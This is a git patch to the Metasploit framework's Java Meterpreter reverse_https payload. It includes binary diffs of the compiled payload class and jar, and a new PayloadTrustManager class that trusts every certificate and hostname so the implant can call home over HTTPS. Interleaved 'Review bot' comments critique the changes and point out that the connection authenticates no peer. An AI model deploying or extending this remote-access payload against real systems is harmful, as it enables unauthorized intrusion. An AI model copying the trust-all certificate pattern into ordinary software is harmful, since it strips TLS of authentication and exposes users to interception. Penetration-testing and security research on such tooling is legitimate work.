From 15913dd92c01b35eafa033118e69d835ba2eeaa4 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 16 Apr 2012 13:15:33 -0600 Subject: [PATCH] Squashed commit of the following: commit 97755336f2227a7db668b61e548d2956dddaccb8 Author: Michael Schierl Date: Thu Apr 5 22:33:40 2012 +0200 make sure PayloadTrustManager gets dropped when using Spawn > 0 commit 0d096043e23af5d46a20b7f2c30c5d926ff66f8d Author: Michael Schierl Date: Wed Apr 4 22:15:23 2012 +0200 Fix connection hangs when using java/meterpreter/reverse_https with recent Java versions Reason is that Java thinks the SSL certificate presented by Metasploit is untrusted; therefore add a hack similar to the one in the metasploit.Payload class to trust all certificates here. [Closes #303] --- data/java/metasploit/Payload.class | Bin 8803 -> 8909 bytes data/meterpreter/meterpreter.jar | Bin 22720 -> 23951 bytes .../javapayload/src/metasploit/Payload.java | 3 + .../metasploit/meterpreter/Meterpreter.java | 9 +++ .../meterpreter/PayloadTrustManager.java | 63 ++++++++++++++++++ 5 files changed, 75 insertions(+) create mode 100644 external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java 
diff --git a/data/java/metasploit/Payload.class b/data/java/metasploit/Payload.class index 505e83d70f4e6bf4e39ca2faba84695da801f329..c8bc897506b6a4d28febbe0324bb2401f67d92c4 100755 GIT binary patch delta 4123 zcmaJ^d0bT07eD9D4DZh4vOPq7Af%?2Gce?a`f^E83k5OJXw1?PCdCj4#Xmt?}JY!?VKEa z;oxK2zy$?jvJPeNlLkL)@QV(&!>>9`|E9x>a6p6KbJpQ6$VH_?G#67eOl2!gVmfI)GZ!;h z7<3S3>evIbB=+Q)UTpN1XiCiHU^zPW!CX2W^VmE>VqbRa$D+T)BP9-yIFQ!|Njys8 z(HaicVI=z4+fSn?YC7g)frbHzg?!#I5{K~AP#uTia26vx;QVN>>R5y$IrgZoDX6BJ z;Aj?>#A79n(QvF6$KiNR{x}UMurX1`Vw|MmWQkKG9?vmP(6EH6jM1qQr%5c8Smwp) zSk7XG#1l1~$*3zN&SE`Vhk1CChLt*0bAhVyWQjqEbNJ*_B+k|GR02!$r)fA(hb7cB zoUcPYhBRED!%k;EDumf>O+XRxT%a0&PMfW$g3OTEMf zZsVC;zD5n3bhrc~8ZOmg6(4q%4wo|-R^c)Ymuq;o#B($}SBKSjo(@;x`Ru=fMU*&& z7qGZcV)P;|)Ws54aweBZyp;7SiI=gyT;dfPUa8?#I;_XlT(GNo{u&n7O1zGdT`w`l z`UZ(Nvc8EMbhC!H=PZ1?na)w zi$`~}Tb#u`Ebe7-AB+20JRtEwo%-eV;zRf_&un5`nwZoWK5!T8p74xPub0w z-@rE!JQazP@EAH9_h|T*!ng4qg?sT`h410}2&w;@!Uy=F!jBk^Yxc}&DFP7WMUhBD zlcn%u`~+dZKU)gB3O1{8X;Y*uR2NzpZcLO2!TdjKy}M^xzBJOXG*S_142PC*j-M+0 z3_sWK3xy|tiC-b4JKnXSx`l=0Ra3W+s=`wWzTkrD1x`~MLXkxZzs7wUexvYP+^_IE z+^^yH3V*;K75)V8DtHa3f^Wj^*cLg=|FgnhV7J0w@wa~+QodkuxQe=Y0Dsr;4~2i? 
zU$I`^Atis~L4?eIz)W6V6>f;s)YmCI#J%>E&M2Qbi@*)1A2v@Yub8C?Py&Te!X@0a z))-o5#nyWJ1w6>~D5)qf7&U6d=z<|iBngf3rzgIP33cH};p~~EN_d4H``Md6U=Q=P zCj$u3T7cGy>+9+WD`C(?vJwjS$0q5+U3*1J>|8xNWv@t8B2A<#ks*xO27MyUWGc}E z4=Ry`ov|PEqcT2&&k?XtiJqdD61{~P8=Tz7wHJ59PDmb;lr3@)@?wFWd9izvOZw~; zeHdb{5_ufs2qBf|EBYzXUmO`rQN5-O5CbXmrbwtUqTnsY+snaQQy-WViiAq)y0!Xk zUUsf#fR_JFgLkM$^=eXduNXwt6-Oy}gv7=@WD ziDEHH!Ap!gl_?r%3O9rrLy`JM1uw(S*6UL?yJD|q4s0#XSS?zA$-K`UT|s{w03<^; zZ=+E*J35+b;Ao<;qp2LEB|l_zP2Zp~Tg2~f7Llf#MJ?%OQ3twNRCBh{oiNEXq_>mg zd$EAoJM(?`00g`TRC4;8C4+QkENJe*v9Tf9r$_z95M!tfK4X{-!<(U3zA>T$a)V~F z4TVNg8}x67BRgPZ(A3*tl%@QpV)xOevcYPHW3{a?Cg?K8w!^rJpxYQ<5%ic|8}cfG zN%=OUR@iWym13sYFu{hNtS6H00mbbwnYQKzV?Sp1LlNtd(>FS$2OLk+E7LK4=$(~m zB%e36?XcE?qqRX_OSVAC8mMZ4sXHLenAQ%-!B&_Wha{RYO5IzbEa+;1>2zqhDao9{ z=80s^tc*i{%S(8Z5_o4Z*x3wLV~94KR2hwfZh0B}$>c}7DX+w8B_E5+Old=(N|uE@ zh-27q1dTaVyLRvwNxyLl(%AA+MV*13CD%cE3(U2WTi{en#bKAJZ-*O9-8jvub#@2L zqq=G~%r`=I6c)5Wm6aTah2$~J@hICh=HPl4&N;o@LXl8D|8 z>89KCxU!OLSQ$U`mFXsmZ>DI8(~{_nPvBE9fZpB2c{rF(OQ!E^RtH=X^tZvKmZt+& zQ5Kh3nyGcbvmk*g+R6NIn&}p_z^y#LwmtS-UP?6RX@PZY-fh0|{NL4h_totnsl$1j$oHO26cUIM^jUG>=P)Ay=t z{}$SvMEf7?fCs4M50+A#hsyloHvS9>h4-_&S(?P z{$sI$6*pN{KEVa!}VHoP#MEDwa|urV(eKIhf8QgB)R| zjs|v;n8h=07CKApBJm_PX6o1#v&lPlV=+f!cUJ4cq^E|xbm))0C7#TSeOPelcnbE_ z@KlMXvGwrj5u0nr)8Ja4Z!S&y+Y$;&_P@B%bBMi5Q;5^lXWfIf*G67BQbH zv6%TZ9p>V6i8C}T(V>h>Q-(7o&XPErgD91Fj*fnco95?ec&-jhs9iW$hiaUs;dwgL z;`vPGGjZ@V=~iPv!!n8G62l8526bq}g-j}#EYh%&JA6#yVlL4ViB;UdYOY_6hP66e zfpr>Qpu=i*R;+PBwo(^3W=+juam{z?$Zn8$BlDXi-pu?K?o~v? zTXopX5v{=6XoR=BXnHNDc8A0!uIoC9|IzVIT(1XceFLxG#i+fTC-33WMpnC*$tEWE zF}a^fl*t1UAJnODnhQ7MLp<{^$F)V`Bg`L_xK-jdi7^eEn*+9uXn#z@$D1`r1Z@_4 z8(Ht1klKQ+3fk}qB5)}3ozo1z3a=p;)xl7pp{}a7GL%0paA8$#V1a^f;9G>wivvpo z1yzBXih`0*ePvC>*v5qmgY^oxlO>Gf4uw1MNd#wpc~zjHLE%%_ijZE=!Qg^GNa54? 
zjKXJemxj+Nd>#%V=;N0M%Nu8h0%cV}g}dQ%GID7{U0_)af;~S}U8isl98vfJ?nO|E zFe+;cCRDQaK6YZyUr_?vP zbq(K8_$I!k@F2deunj4kw0}qZ4!*1KJ$8OlN9VWAy@yIzu>P3o&Mjl z@ypADb)m}I8il`c%^g#w70;MSr5i*a7AF>$kZ7AVgD!#J75;($Rrn|VMH=;iWj=++ z1w_7a^%{csHl;DCq&RQr(80s<`YR!XjnWr(>e`}EsII}+-lUpfsDSJ#;SkQqNIlo~ zCM8p)XFD||Bp!~e(Fb|jgbTr)h?CVzg7r&-^(D3COM)RbswTexJan2w0$mAv!6MCEN&I+PgF^5DHAH`A3s>MQ%h5bsL%34UFoF-035c&C<@F?Ns1ad_$ zCGy1ld^(GQYSK^i=g|Nq28uySpct$~p%|jXP}UwMe7rCmL91=ZuL)EKH8Dbokz$k* zXNb`X_Ho>44A%UHU|pa-5UQkHD_sf!b}Pc={_U+ z4#}Cs=}>~h(*n+I2?ZCt3-5v8WqTU^sK^Ac{Set`9>i{ui@GkH9f$sYQ*VI*KIJu) zG0=iRrm|pgD->!wVTj*m3~hyBC4Rf%EAcx_mj&HR{LWkp(n>5C?n^aOEf`@zXXYb` zXThje7#*3D-4`KpS$5Cxm@F7eGpjN%di>C;bfSBs!e(l_;m$bZ_)V<^dirDx#;t?$ z7>wTo>BfXsNbxtr_$WAO#yHEq6DIm?F_=Uy&o(8AlUbZXVo_-ndiz`ytuq;IF^4*h zL)ADy>tvWtD!R|bp_h;z?WU}ftECCIMr3ritnf@@mIa&Mpovy!xxt%`gt@CD`?jxW{Ro2#-&^_Gpz-} z+dv3S3>TwdD)D(@KFlCUzE58}p>zi5{A?wm3A1QUqm@aX_7GNb2ua@-WKCt9<}ys} znHjJ{`W$&?*kQqC{z9j?3o=Z*>9Dz-7F-@Ze#EpBfRpfNZ%*>@5qt~=(A}Bzho_Ub z6aaL`;R?UE1y=bSaac`RTm^?;(0eMC z`oVSJz^Qrd2IwU^Vc-ec?j!?S;;@+G;qx=JJ8Z!sW^$x)b2jo3kPp5dXLJG1YGLQghD`6L<3cH8aq6GOM%u?f=II!|nm zg56W(A+tN^W+WS_RJ|hJKX0-laSszL?VgfkN|JwfQ}Y>ZeIYWvci-9VZ{>G?KXGFc yAOsj}Jk<(M$KV+Yo^6I*#&aY!!}G@O80?}}G{ZeHlJ+EqmJ;9*bCC8|MxI0DuPou+)Vo5_97` zxCW^>924x2#D3;m_|A*NSsad_#*(-hBJ{E3Z!r-|<_2rWuspFzt_{VI=#X^9y8wU- z0m7Y=rPlop+R%y_Y^}o(Xg7H+BmDdcm>Y_yf?>7+4{W))>^pa zXI%Un^Hb}95!PO|6vWHB9~^KZcekUe%Wdl7B`N$BGxrG_RsHW_X1)^&sutaI6~T~j z=2Dv8Y~B;myYNbD9E+o+zR9ZyF@?kpAF6E+gHFrRna~cyfK^NF1EaeNM*DC{e-(>g zjq(=^aITR>z7t$37k`!FD}%K&F7%lLS!dt{HPn9^3wvP8Qtm{Os%Y=0NZup;d)Ycy zQL)~4uS!--UapA!ITUu4nqrA(mA-YNAb%nF=i|<+p6n5i7HK(KAlyp(?U=4PU}}F zLyGGny)E!S+JN3XOXlb{HRfo(}`uM}l7 z*}7>JEUH3oGwnEMhv$aHP*qo}$2mE##=oN_Qoe#9eBN=d&$o66%*){8KD+#zbt0p{P)hz&UUgmtA8$AqH5QxB7E>dA1fED3#};7 zZTn5Zh_AAmnDiq$O`_j$Rq{kDHZ{lHjr0ZsOl*GN%0L>A3Y&OpQbR@FtF%U$BwB>N z!$BO!oG)m&|7)yts_^-6G8rvZlCgEdlA!-lh<#!*M^&QMPCpUxK#(N=-i)vn-JDTL zf43n>N4FT7GlzW50fg|a4D>(S)SS}Dw~4(U=JU!&a+PbhpN1A5_D+H>K7T61?qDO_ 
z%2obdM@FI!jR9f+e_CSBpIvzV6H79y#iD8#gYd9v@=`lb>Z|m|`<29$JaZ|glpa=S zjXjkpI#O~JBI(>pbPw6MVnIS?Xve$zk7RuoX%ymv*Wj z8a7VfG(3V-2kFCmllG<9y5FQ3Az7SOqkmTlB<2Lp2+5>M=?T4KJ-4egN*9To#f>wL z+Q|;D;44jJb8<_5(0}T!E}Jev19132u1!__YaaV$r3#;RvQ7UVzuHHQdDCljK~14P z&EXmAng=1$hsaHud%kUz4nO|PTvDGUhu@{Vs<9pjDbX=#c{Fy<15ApK!J3zROjUe1_ zdJ$hs4AMwoVv2rb5`RA5{JdrEuaxJd(l&ACTSF67xxO;IUk-S#!9C#JbuL(DMnXF7GX`tn70}r^l;`(-Ed&Pf1(L( z1srptEHaqwoJ$hxRjTi(Rat2+b938^q_2E0>|YP^GtxrWfjI5N9x1ia#Z74nh~M*d z6jLgKiv`9jZqo^m2#;1&lm~6+?pEAwY21y`(QrH}5`lTK1UHMqY#>RvDcaa-806kM zYQzk>{wWusf@$1;4LTkVI?!|5nGZUosp9jl0{zT8e{C!%v~Wo$r%3wz@V;F6___4X z(-qr^Eu6zwCm7t*a`Ux11%!}I9taCV%5w;}ieoB>r@ZS039Z+&>(#Ll{v!TJmw9^2 z279>|d(wZN=1q5FQKV=dsEdCu;PI#po#|L)XMUoq2K&gpRrbCYWguqi#sHnCdCy_a zujaGIw>-}BK@M9+MDDiE{7f;RaJRW?JhP)Iy3B&HwWG1-l)E94bDE(+N%BMLC)S4W zWfzwq))MU4UqcbXmUt|jJ#E=JV?2ieaas9-?}`Zr#2q`-(SpwpDdj50kz!{xGe@-1 zd4*IfjxW{p4BzHg-ESy=m*?OyjJu;RGEGk_{-d_6Porp-Uiu?W+>nt>5z-Jpd$pS^ z!GttfK(Rat-L$v*FtM|fgUBV@#ZA^2?%a(ppGRvR5kOqS1$A3xn;9_?%Rg~Er7F_5 zinL|?ep=jqSlXxaMHJN~XzmD&3N{b%f$)!-0!xQs4|r3s4pvp9sf0Nyoet8TaC@(B zoM!&HUR%Da!M@;xs++b`Md5FwXN07?@#ICDm%L9~M!N>>h?|*TJ4~|qo<8G)JEr`! 
zeo5{wq%H{|Co7o^Zq4I^?94^zA-5*MUGAp@+?K$vCX*t3P4>G22?|fAX8wLl>}+y7=F4P3c1%f^rTHp2tNWQu?gT&ZR+I-_`# z7#>GJl3H4;)+tuHp1j`yo*Qb4(&~CvY}Y46Nhh_2PvfS7BO+MyW6@HguC>y2n@+Xl zPURqe57q$GbW^qJcN*^H!abCU<9E_7aH6lVoPHIUM-z?6g2PWY;=exeaNmw(5^F!K}0)0;+ z!ZtoT({oBqMPEI9B5yo}echonPi-@c<2fyARIaBoKU*y_?c@s;j;~ny+jodV@|b|U z@-mpIU(d)3rRFtgLI+&Y(}0X*V_Zg4bzLou3jW^Z7*a!ev`Fu|IMa?WQZOu9+FJP3irFZ1?>~C2 zArS*q?yq?7K*kPot%!YsFPQf*e{1lrzc)urqi*{V#exq!guFcg8MGjC#n14IjP*)l z8F!6SFmJ7Z;M?iu=aa<&4W=GY^Zu-3jW~mTQ%4m?Oj*$B&N{Wb7fD=#(fCv*k!63u z`%pn}z#ChSxZTpmFVBE(Na7aJ7$+B@Y$|XUOHr{wW)adOxN>aA%BN~7Gxdk-u8-u9 zMWjV)2+9sl+b3tz!F>>Dv0nCEZ^OY~&o)E{kk#3cWq)-9ogb$^Tuf8j;(wBHxpTqb zDRJ&LxMJUcyaImfF>|dyY_8}9uV!`nz9l&GGYxtwHoel3)wAum|I_*R&$UZgdjrV9 zQ-}T%nT)q)_SHktE|r?bF+Oi={MCWxqb`-et1LP=1lZW9Q(fK%{cSYUrW)AZ{bdr# zXgho9oSrQSReUJr9zb#*30Qfn5Vc!RS_OK{@7adv+xE0+gjc~Wfqvn#ve50y_4>a(_^BY$zcekJ%NW{Fkz1JiL$huU zks_XAlEBDEQZx7>fw3`EN3g1-UoD;Yd<7oyhwciU$qbTuGzg2HmS;qH5bgCY?oo~t zPyjr?4L)cI#M*xA4bDyRv$%8Mxb(-7<_GH(ZsTgYXfGO@0_FAr$-Z=SV}G(mjHUQ- zp!j)1ue1}@^I7KS25v{V?${LbkC!aU6v965F*2nGE&?Yc5+p;KI({jxv++m-gk(_V(7ntxk$=2jCG#s*$abn^cKp|sC zdkoR|3Tp_P(Np@NJla{cE}_GgF_(j}a^a>f4ID-D;6};)5G1g77f}Dymn+r0sM~f# zc#*Zj!2jMp5r}l&CbsDQRPRs?BiVq528%jdjsi0-xcr~Z`oEBuN(t)Z&k{sKfz zNT6TD)P_yn>C;vRV+boP`Xn6UL{BD-iU~hSl{JVORg?IkzY8 z3}OQSqt}hD*iGvS*S89AcC)fI_Vn@c*0plAaPmmDhe zLdjTFf2LP^laN<1SBm3)6kQ?rNr^8KI`gHVjqOL#3G+ox!XJsx4iV7`gZ{e`4;CIc zBEEXLWgnotb_2fsR9I|h3n!DE7=MXH6~>!8;;5>l_LNO}93IX>jG-|QF6|o6u~N*U z@NDK0cZ1n3H9XxdrZMt>^vFeW&h1BhGexl^*37piZgw3KN`D4=4z-1HK~@W(gU$9E zDUidS&~ItbU0splvO2H8YRr8$waN%z`G`{*hZV^eRh{0;5m`I zTzO>MIE|kW(it+j3=CsJI;vOE<`V8|8QEy_(WSr1+Dd%V<$>}mB-^TtTP+CFEQ!FjNq!{lw?67vbb?*0 z8cZg~ng1nV`!E`Ekd9Ueq%%58oYE}C>sCG((T1Cl{{=x5Ht?yi zK0}X@opzx2L|}%xKWgI+(rI~Io=zUJ%(qnn@2WVATx-PHm`0#2UYB9lCnoEM{VIv= z8IKBiZEVd)ncbb$2WLGbJJ@H&D`?2MP_`zG8+woDrV?FjIZ-DxoE$7B7=@?%Q;DtI z4)<)2w6Bd3iV;}b~rD;Vd5@W1EaM(kl`8d&YTR*lGO?HModaD;2Z zYwbAk@ose<4*?#mTP9P`ocNZxl!am68ZZSI&aE-6T#I#U#HcR+Ww?P3|1#_~IR0{e 
zqxJ1CCQ#=T3+MXu)%xls+!_dceW@Fz3Zbg6a1#X)sV{hoP5O^+#i}EH(Ct{>K<^gg z4YY4@!NB?!l?{z9Hq7ZmCQGDnuNZ=%(6;=4<*=^lusuac<1};O0vSJa#(9yS}kjZ~y?% zzrva;{p0)`{8#-@V0!EUm0McK< zy>2$9Q>byL@H#2E>y7<8sW1BfEL1S1zWH+yP*ZyBPlkWf1c*#iDiS&X9e^Ak0B|tA H+0lOhcE9Co delta 4239 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 diff --git a/external/source/javapayload/src/metasploit/Payload.java b/external/source/javapayload/src/metasploit/Payload.java index 083d32c256..7afa376932 100644 --- a/external/source/javapayload/src/metasploit/Payload.java +++ b/external/source/javapayload/src/metasploit/Payload.java @@ -105,6 +105,9 @@ public class Payload extends ClassLoader { classFile.getParentFile().mkdirs(); // load ourselves via the class loader (works both on disk and from Jar) writeEmbeddedFile(clazz, clazzFile, classFile); + if(props.getProperty("URL", "").startsWith("https:")) { + writeEmbeddedFile(clazz, "metasploit/PayloadTrustManager.class", new File(classFile.getParentFile(), "PayloadTrustManager.class")); + } FileOutputStream fos = new FileOutputStream(propFile); props.store(fos, ""); fos.close(); diff --git a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java index 79cb3b5678..97377a1f0e 100644 
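Review bot: The added `if` in the Payload.java hunk has no comment saying why a second class file is written, and only for https URLs. Going by the commit message, this is what puts `metasploit.PayloadTrustManager` on disk for a spawned copy; a line such as `// https URLs need metasploit.PayloadTrustManager next to the spawned Payload class` would record that. The test is also a case-sensitive prefix match on the raw `URL` property, whereas the Meterpreter.java hunk compares the parsed protocol with `url.getProtocol().equals("https")`, so the two checks may disagree on a differently cased scheme. The enclosing method starts and ends outside the hunk, so the rest of the file handling cannot be checked from here.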
--- a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
+++ b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
@@ -167,6 +167,15 @@ public class Meterpreter {
 TLVPacket request = null;
 try {
 URLConnection uc = url.openConnection();
+ if (url.getProtocol().equals("https")) {
+ // load the trust manager via reflection, to avoid loading
+ // it when it is not needed (it requires Sun Java 1.4+)
+ try {
+ Class.forName("com.metasploit.meterpreter.PayloadTrustManager").getMethod("useFor", new Class[] {URLConnection.class}).invoke(null, new Object[] {uc});
+ } catch (Exception ex) {
+ ex.printStackTrace(getErrorStream());
+ }
+ }
 uc.setDoOutput(true);
 OutputStream out = uc.getOutputStream();
 out.write(outPacket == null ? RECV : outPacket);
diff --git a/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java
new file mode 100644
index 0000000000..d17fc46287
--- /dev/null
+++ b/external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/PayloadTrustManager.java
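Review bot: The `catch (Exception ex)` in the added block only prints the failure and then falls through, so when the reflective `useFor` call fails the request goes out under the JRE's default certificate checks with nothing at the call site saying so. If that is meant as best effort, it should be stated, e.g. `// best effort: on failure the JRE default trust settings stay in effect`. The long `Class.forName(...).getMethod(...).invoke(...)` chain would also read better split over three lines. The enclosing method starts and ends outside the hunk.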
@@ -0,0 +1,63 @@
+package com.metasploit.meterpreter;
+
+import java.net.URLConnection;
+
+import javax.net.ssl.HostnameVerifier;
+import javax.net.ssl.HttpsURLConnection;
+import javax.net.ssl.SSLContext;
+import javax.net.ssl.SSLSession;
+import javax.net.ssl.SSLSocketFactory;
+import javax.net.ssl.TrustManager;
+import javax.net.ssl.X509TrustManager;
+import java.security.cert.X509Certificate;
+
+/**
+ * Trust manager used for HTTPS URL connection. This is in its own class because it
+ * depends on classes only present on Sun JRE 1.4+, and incorporating it into
+ * the main {@link Meterpreter} class would have made it impossible for other/older
+ * JREs to load it.
+ *
+ * This class is substantically identical to the metasploit.PayloadTrustManager class,
+ * only that it tries to cache the ssl context and trust manager between calls.
+ */
+public class PayloadTrustManager implements X509TrustManager, HostnameVerifier {
+
+ public X509Certificate[] getAcceptedIssuers() {
+ // no preferred issuers
+ return new X509Certificate[0];
+ }
+
+ public void checkClientTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+ // trust everyone
+ }
+
+ public void checkServerTrusted(java.security.cert.X509Certificate[] certs, String authType) {
+ // trust everyone
+ }
+
+ public boolean verify(String hostname, SSLSession session) {
+ // trust everyone
+ return true;
+ }
+
+ private static PayloadTrustManager instance;
+ private static SSLSocketFactory factory;
+
+ /**
+ * Called by the {@link Payload} class to modify the given
+ * {@link URLConnection} so that it uses this trust manager.
+ */
+ public static synchronized void useFor(URLConnection uc) throws Exception {
+ if (uc instanceof HttpsURLConnection) {
+ HttpsURLConnection huc = ((HttpsURLConnection) uc);
+ if (instance == null) {
+ instance = new PayloadTrustManager();
+ SSLContext sc = SSLContext.getInstance("SSL");
+ sc.init(null, new TrustManager[] { instance }, new java.security.SecureRandom());
+ factory = sc.getSocketFactory();
+ }
+ huc.setSSLSocketFactory(factory);
+ huc.setHostnameVerifier(instance);
+ }
+ }
+}
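Review bot: The Javadoc on `useFor` says it is called by the `Payload` class, but the caller added in this commit is `Meterpreter`, through reflection, and `{@link Payload}` has no matching import in this file; the line should read `Called by the {@link Meterpreter} class (via reflection) to modify the given`. The class comment should also spell out what the empty `checkServerTrusted` and the `verify` that returns `true` mean: the connection authenticates no peer, so it protects only against passive eavesdropping and any party on the path can present its own certificate. `SSLContext.getInstance("SSL")` deserves a short comment too, since which protocol versions that name yields depends on the JRE. The class comment also misspells "substantially" as "substantically".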